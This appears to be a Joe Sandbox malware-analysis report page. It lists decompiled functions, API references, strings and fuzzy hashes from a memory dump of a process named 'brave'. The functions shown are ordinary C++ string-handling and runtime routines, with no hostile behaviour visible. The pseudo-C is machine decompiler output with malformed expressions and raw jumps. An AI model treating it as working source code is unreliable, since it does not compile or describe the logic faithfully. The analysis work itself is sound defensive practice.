Opcode Fuzzy Hash: 9553ad4b2fb8957eda4529e061e9a93a6dd067d7bb1be6d681d056781aa60a57
Instruction Fuzzy Hash: 8E41E4E3B0AA8981DE10DB29D5485B92360EF56FD8F9440B1DF9D87392EF2ED4A1C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6027CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF6A6027CE0(intOrPtr* __r8, void* __r9, intOrPtr _a40) {
				void* _t8;
				void* _t22;
				intOrPtr* _t25;
				char* _t27;
				int _t28;
				int _t30;
				intOrPtr _t40;
				void* _t47;
				intOrPtr _t49;

				_t40 =  *((intOrPtr*)( *__r8 - 0x18));
				_t47 =  >  ? _a40 : _t40 - __r9;
				if (__r9 - _t40 > 0) goto 0xa6027d12;
				goto 0xa6027b40;
				_t27 = "basic_string::insert";
				_t25 = "%s: __pos (which is %zu) > this->size() (which is %zu)";
				E00007FF67FF6A6031250(_t8, __r9 - _t40, __r9, _t25, _t27, __r9,  *__r8 + __r9);
				_t49 =  *((intOrPtr*)( *_t25 - 0x18));
				if (_t27 - _t49 > 0) goto 0xa6027db0;
				if (__r9 - 0xfffffff9 - _t49 > 0) goto 0xa6027dc6;
				r8d = 0;
				E00007FF67FF6A6028580(_t25, _t27, __r9, __r9);
				if (__r9 == 0) goto 0xa6027d8c;
				if (__r9 == 1) goto 0xa6027da0;
				return memset(_t22, _t30, _t28);
			}

0x7ff6a6027cec
0x7ff6a6027cfc
0x7ff6a6027d03
0x7ff6a6027d0d
0x7ff6a6027d15
0x7ff6a6027d1f
0x7ff6a6027d26
0x7ff6a6027d3f
0x7ff6a6027d4f
0x7ff6a6027d61
0x7ff6a6027d66
0x7ff6a6027d69
0x7ff6a6027d71
0x7ff6a6027d7e
0x7ff6a6027d98

APIs

memset.MSVCRT ref: 00007FF6A6027D87

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF6A6027D1F, 00007FF6A6027DB3
basic_string::insert, xrefs: 00007FF6A6027D15, 00007FF6A6027DBA
basic_string::_M_replace_aux, xrefs: 00007FF6A6027DC6

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: memset
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_replace_aux$basic_string::insert
API String ID: 2221118986-1339558951
Opcode ID: 76e07345fcce7906114913821502996534838701bb96e1ead79225c16b90c7dc
Instruction ID: 7994bc6a002d2be7d72564dce5a5dd3a25009e35ddf6f1131bd09bb3d0b6f3a5
Opcode Fuzzy Hash: 76e07345fcce7906114913821502996534838701bb96e1ead79225c16b90c7dc
Instruction Fuzzy Hash: 55313466F0B64641EA11DB26DA418ED6360AF99FE0F884672DF1C87391ED3EE9D1C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6030C80 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF6A6030C92
memcpy.MSVCRT ref: 00007FF6A6030CE4
memcpy.MSVCRT ref: 00007FF6A6030D94

Strings

basic_string::append, xrefs: 00007FF6A6030D3A

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: memcpy$wcslen
String ID: basic_string::append
API String ID: 1844840824-3811946249
Opcode ID: 148ea95ba2453b8e9f4c57894deee56eaa111a687ced5c9b40be94197a186ef0
Instruction ID: 50c209db65addea18b58a25203ef2a7c2922ac0f42ea0d7f8fc4ac92f86ae393
Opcode Fuzzy Hash: 148ea95ba2453b8e9f4c57894deee56eaa111a687ced5c9b40be94197a186ef0
Instruction Fuzzy Hash: 8C31B266B1BA4580DA10DB25D5489BEA3A1FF55FC5B848932DE2E873D0DF3EE4A1C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A60318C0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

malloc.MSVCRT(?,?,FFFFFFFF,00007FF6A6027139,?,?,FFFFFFFF,00007FF6A6026BB5,?,00000000,basic_string::_M_create,00007FF6A602A151), ref: 00007FF6A60318D4

Part of subcall function 00007FF6A60319A0: malloc.MSVCRT(?,?,?,?,00007FF6A60323B5,?,?,?,?,00007FF6A6003C24), ref: 00007FF6A60319B1

malloc.MSVCRT(?,?,?,?,?,?,?,00007FF6A6027139,?,?,FFFFFFFF,00007FF6A6026BB5,?,00000000,basic_string::_M_create,00007FF6A602A151), ref: 00007FF6A603193A

Strings

basic_string::_M_create, xrefs: 00007FF6A60319A0

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: malloc
String ID: basic_string::_M_create
API String ID: 2803490479-3122258987
Opcode ID: 4b7b9b0c657b2bedbbe5b7b4e114ee3aa089cd27d8a34a41591c0c705e869eea
Instruction ID: 878598c453f343aa315aad55a8a43f6d562cba0d9957cbd474f114dfaef9c50f
Opcode Fuzzy Hash: 4b7b9b0c657b2bedbbe5b7b4e114ee3aa089cd27d8a34a41591c0c705e869eea
Instruction Fuzzy Hash: CE21F121B0774645FE48AB64A6123B87290AF5CFA0F9806B5CF2D823C2DF3E61E5C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A602DC10 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 102stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF6A602DC22
memcpy.MSVCRT ref: 00007FF6A602DC72
memcpy.MSVCRT ref: 00007FF6A602DD21

Strings

basic_string::append, xrefs: 00007FF6A602DCCD

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: memcpy$strlen
String ID: basic_string::append
API String ID: 2619041689-3811946249
Opcode ID: 053ff8a127323fabc25172c75465cfa7311902f130f2a5a7fc06635915c12a55
Instruction ID: c6b07e2685ab0a1c50e625ce49dfe43a2bed8afbf746699927aa41634f332ec1
Opcode Fuzzy Hash: 053ff8a127323fabc25172c75465cfa7311902f130f2a5a7fc06635915c12a55
Instruction Fuzzy Hash: 5031C3A3A0AB8680EA10CB25D5585793364EF46FD4F9845B2EF6D873C2DE2ED890C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6028580 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E00007FF67FF6A6028580(long long* __rcx, void* __rdx, void* __r8, void* __r9) {
				void* _v73;
				void* _t16;
				intOrPtr _t23;
				intOrPtr _t24;
				long long* _t25;
				long long _t37;
				intOrPtr _t38;
				long long _t45;

				_t23 =  *((intOrPtr*)(__rcx));
				_t38 =  *((intOrPtr*)(_t23 - 0x18));
				_t25 = __rcx;
				_t37 = __r9 - __r8 + _t38;
				if (_t37 -  *((intOrPtr*)(_t23 - 0x10)) > 0) goto 0xa60285cb;
				if ( *((intOrPtr*)(_t23 - 8)) <= 0) goto 0xa6028660;
				_t24 =  *((intOrPtr*)(__rcx));
				E00007FF67FF6A60270D0(_t16, _t37,  *((intOrPtr*)(_t24 - 0x10)));
				if (__rdx == 0) goto 0xa6028600;
				_t8 = _t24 + 0x18; // 0x18
				_t45 = _t8;
				if (__rdx == 1) goto 0xa60286a0;
				memcpy(??, ??, ??);
				if (_t38 - __r8 + __rdx != 0) goto 0xa6028640;
				asm("lock xadd [ecx-0x8], eax");
				if (0xffffffff <= 0) goto 0xa6028690;
				 *_t25 = _t45;
				 *((intOrPtr*)(_t45 - 8)) = 0;
				 *((long long*)(_t45 - 0x18)) = _t37;
				 *((char*)(_t45 + _t37)) = 0;
				return 0xffffffff;
			}

0x7ff6a6028590
0x7ff6a6028593
0x7ff6a60285a8
0x7ff6a60285ae
0x7ff6a60285b7
0x7ff6a60285be
0x7ff6a60285c4
0x7ff6a60285d3
0x7ff6a60285e2
0x7ff6a60285e7
0x7ff6a60285e7
0x7ff6a60285ef
0x7ff6a60285fb
0x7ff6a6028603
0x7ff6a602860d
0x7ff6a6028614
0x7ff6a6028616
0x7ff6a6028619
0x7ff6a6028622
0x7ff6a6028627
0x7ff6a602863c

APIs

memcpy.MSVCRT ref: 00007FF6A60285FB
memcpy.MSVCRT ref: 00007FF6A6028681

Strings

basic_string::_M_create, xrefs: 00007FF6A6028586

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: memcpy
String ID: basic_string::_M_create
API String ID: 3510742995-3122258987
Opcode ID: 52dd81f1854489c19ed0bec846985ecada794f828c33243cca3a44cf1c7bc96e
Instruction ID: 44ed8dd24eb8652dc154fd0a6d53023e68ee4abd0c37c355d4ee58baba3e2395
Opcode Fuzzy Hash: 52dd81f1854489c19ed0bec846985ecada794f828c33243cca3a44cf1c7bc96e
Instruction Fuzzy Hash: F831D36AB1B98289E6119E39968C67E37606F11FC8F5940B2DF0C87392DE2ED4D5C341

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6027770 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00007FF67FF6A6027770(long long* __rcx, void* __rdx, void* __r8) {
				intOrPtr _t15;
				void* _t18;

				_t15 =  *((intOrPtr*)(__rcx));
				_t18 = __r8;
				if (__r8 - 0xfffffff9 > 0) goto 0xa6027885;
				if (_t15 - __rdx > 0) goto 0xa60277c0;
				if (_t15 +  *((intOrPtr*)(_t15 - 0x18)) - __rdx < 0) goto 0xa60277c0;
				if ( *((intOrPtr*)(_t15 - 8)) <= 0) goto 0xa60277f8;
				E00007FF67FF6A6028580(__rcx, _t15 +  *((intOrPtr*)(_t15 - 0x18)),  *((intOrPtr*)( *((intOrPtr*)(__rcx)) - 0x18)), __r8);
				if (_t18 == 0) goto 0xa60277e7;
				if (_t18 == 1) goto 0xa6027840;
				return memcpy(??, ??, ??);
			}

0x7ff6a6027779
0x7ff6a602777f
0x7ff6a6027796
0x7ff6a602779f
0x7ff6a60277a8
0x7ff6a60277af
0x7ff6a60277c8
0x7ff6a60277d0
0x7ff6a60277da
0x7ff6a60277f3

APIs

memcpy.MSVCRT ref: 00007FF6A60277E2
memcpy.MSVCRT ref: 00007FF6A602781C

Strings

basic_string::assign, xrefs: 00007FF6A6027885

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: memcpy
String ID: basic_string::assign
API String ID: 3510742995-2385367300
Opcode ID: fb17081675a219e1f0fc3f775fff8980a65a6587ebdc272469192e30fdad70a3
Instruction ID: f97b6e6ca8600e2f039b3217e8572e9486cbb084793261a5a97d76a5ea5de084
Opcode Fuzzy Hash: fb17081675a219e1f0fc3f775fff8980a65a6587ebdc272469192e30fdad70a3
Instruction Fuzzy Hash: E231F6A6B4A68140EE128A36864817D6B90EF4AFC4F8C44B2CF1DC7381DE7ED4D0C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A60217C0 Relevance: 6.1, APIs: 4, Instructions: 92COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 00007FF6A602181A
MultiByteToWideChar.KERNEL32 ref: 00007FF6A602185A

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: 50a1678145b16bab232309967df9fd668cd50a23a04a899717ea535bdf31dc07
Instruction ID: a0230203e69be1c1a3dc1371296574638c6d58eeea8df6bb650d9ae6663e9ff7
Opcode Fuzzy Hash: 50a1678145b16bab232309967df9fd668cd50a23a04a899717ea535bdf31dc07
Instruction Fuzzy Hash: 5631D272A0E28186E3608B34B54037E66A0FFA5B84F5481B1DB98C77D8DF7ED5E18B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6013E60 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF6A6013E7D
GetProcessAffinityMask.KERNEL32 ref: 00007FF6A6013E8C
GetCurrentProcess.KERNEL32 ref: 00007FF6A6013ED2
SetProcessAffinityMask.KERNEL32 ref: 00007FF6A6013EDA

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 04ae4b65f7585559c3679ad51c5bc39c8c573643832490c12df30e719fc6ef8c
Instruction ID: 3e442c532205d1ea75e7246372509785d0f92627825d7613b269bce656d4f084
Opcode Fuzzy Hash: 04ae4b65f7585559c3679ad51c5bc39c8c573643832490c12df30e719fc6ef8c
Instruction Fuzzy Hash: B501D421B0A70641EA2987257A0036B5A90BB04B8CF442035CE4E83394EE7EEE95C210

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A600E830 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 183
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF6A600E830(void* __eax) {
				intOrPtr _t4;

				_t4 =  *0xa62c10f0; // 0x1
				if (_t4 == 0) goto 0xa600e860;
				return __eax;
			}

0x7ff6a600e845
0x7ff6a600e84d
0x7ff6a600e85f

APIs

VirtualProtect.KERNEL32(00007FF6A62C1098,00007FFC2FC93CA0,?,?,?,00000001,00007FF6A6001261), ref: 00007FF6A600E9D5

Strings

Unknown pseudo relocation bit size %d., xrefs: 00007FF6A600EA95
Unknown pseudo relocation protocol version %d., xrefs: 00007FF6A600EAA1

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: ProtectVirtual
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
API String ID: 544645111-395989641
Opcode ID: 5fb716cdb40ff7fdc5252b81bfc427b99c136fbcf60d099ab7d8640e641fe08e
Instruction ID: ec965ef90268b0dcbd461b0344d2f4f60b52cd6aae825cf8bd28a476eb7f5ba4
Opcode Fuzzy Hash: 5fb716cdb40ff7fdc5252b81bfc427b99c136fbcf60d099ab7d8640e641fe08e
Instruction Fuzzy Hash: E061D072F0A64286EB108F20BA411797761FB5AF94F158235DE5DA73D9DE3EE4A1C200

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6011110 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00007FF67FF6A6011110(void* __rcx) {
				void* _t29;
				intOrPtr _t39;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t64;
				void* _t68;
				void* _t76;
				intOrPtr* _t80;
				intOrPtr* _t81;
				intOrPtr* _t82;
				void* _t89;

				if (__rcx == 0) goto 0xa6011310;
				_t80 =  *0xa62b6920; // 0x7ff6a62c1400
				_t52 =  *_t80;
				if (_t52 == 0) goto 0xa60111f8;
				if ( *((long long*)(_t52 + 0x90)) != 0) goto 0xa6011220;
				 *((long long*)(_t52 + 0x90)) = 0xa62b2bc0;
				E00007FF67FF6A6018830(0xa62b2bc0, _t76);
				_t53 =  *_t80;
				if (_t53 == 0) goto 0xa6011238;
				if ( *((long long*)(_t53 + 0x88)) == 0) goto 0xa6011260;
				_t55 =  *((intOrPtr*)( *((intOrPtr*)(_t53 + 0x88))));
				if (__rcx == _t55) goto 0xa6011348;
				if (_t55 == 0) goto 0xa6011348;
				_t56 =  *((intOrPtr*)(_t55 + 0x18));
				if (_t56 == 0) goto 0xa6011320;
				if (__rcx != _t56) goto 0xa6011190;
				_t39 = _t56;
				if (_t39 == 0) goto 0xa6011320;
				 *((intOrPtr*)(__rcx + 0x10)) =  *((intOrPtr*)(__rcx + 0x10)) - 1;
				if (_t39 == 0) goto 0xa60112b8;
				_t57 =  *_t80;
				if (_t57 == 0) goto 0xa6011280;
				if ( *((long long*)(_t57 + 0x90)) == 0) goto 0xa6011299;
				if (_t57 == 0) goto 0xa601134f;
				_pop(_t81);
				goto E00007FF67FF6A6018870;
				E00007FF67FF6A6017060();
				if ( *((long long*)(_t57 + 0x90)) == 0) goto 0xa6011145;
				if ( *_t81 != 0) goto 0xa6011220;
				E00007FF67FF6A6017060();
				E00007FF67FF6A6018830( *((intOrPtr*)( *_t81 + 0x90)), _t76);
				_t59 =  *_t81;
				if (_t59 != 0) goto 0xa6011164;
				E00007FF67FF6A6017060();
				_t60 =  *_t81;
				if ( *((long long*)(_t59 + 0x88)) == 0) goto 0xa6011260;
				if (_t60 != 0) goto 0xa6011172;
				E00007FF67FF6A6017060();
				goto 0xa6011172;
				 *((long long*)(_t60 + 0x88)) = 0xa62c1388;
				goto 0xa6011179;
				asm("o16 nop [cs:eax+eax]");
				E00007FF67FF6A6017060();
				if ( *0x7FF6A62C1418 != 0) goto 0xa60111d4;
				 *((long long*)( *_t81 + 0x90)) = 0xa62b2bc0;
				_pop(_t68);
				_pop(_t82);
				_pop(_t89);
				goto E00007FF67FF6A6018870;
				_t16 = _t89 + 8; // 0x8
				_t29 = E00007FF67FF6A60109D0(_t16);
				if (_t68 == 0) goto 0xa60112dd;
				 *((long long*)(_t68 + 0x18)) =  *((intOrPtr*)(_t89 + 0x18));
				free(??);
				goto 0xa60111ba;
				_t64 =  *_t82;
				if (_t64 == 0) goto 0xa6011359;
				if ( *((long long*)(_t64 + 0x88)) != 0) goto 0xa6011378;
				 *((long long*)(_t64 + 0x88)) = 0xa62c1388;
				 *0xa62c1388 =  *((intOrPtr*)(_t89 + 0x18));
				goto 0xa60112d0;
				return _t29;
			}

0x7ff6a601111e
0x7ff6a6011124
0x7ff6a601112b
0x7ff6a6011131
0x7ff6a601113f
0x7ff6a601114c
0x7ff6a6011153
0x7ff6a6011158
0x7ff6a601115e
0x7ff6a601116c
0x7ff6a6011179
0x7ff6a601117f
0x7ff6a6011188
0x7ff6a6011193
0x7ff6a601119a
0x7ff6a60111a3
0x7ff6a60111a5
0x7ff6a60111a8
0x7ff6a60111ae
0x7ff6a60111b4
0x7ff6a60111ba
0x7ff6a60111c0
0x7ff6a60111ce
0x7ff6a60111d7
0x7ff6a60111e9
0x7ff6a60111ec
0x7ff6a60111f8
0x7ff6a6011208
0x7ff6a6011211
0x7ff6a6011213
0x7ff6a6011227
0x7ff6a601122c
0x7ff6a6011232
0x7ff6a6011238
0x7ff6a6011245
0x7ff6a6011248
0x7ff6a601124d
0x7ff6a6011253
0x7ff6a6011258
0x7ff6a6011267
